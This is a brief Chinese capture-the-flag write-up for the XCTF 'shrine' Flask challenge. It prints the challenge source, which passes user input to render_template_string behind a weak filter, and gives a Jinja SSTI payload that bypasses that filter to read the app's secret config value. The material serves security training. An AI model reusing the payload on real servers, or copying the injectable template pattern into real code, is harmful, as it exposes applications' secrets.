shrine xctf 攻防世界 web高手进阶区

题目描述

进入题目场景，发现一段代码

经过整理后得

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

审计代码，可知flask 在 /shrine/ 下的 SSTI，对 payload 进行了过滤，对小括号进行了调换，将 ( 和 ) 调换为空字符串，将 config 和 self 添加进了黑名单

payload：http://111.200.241.244:51924/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}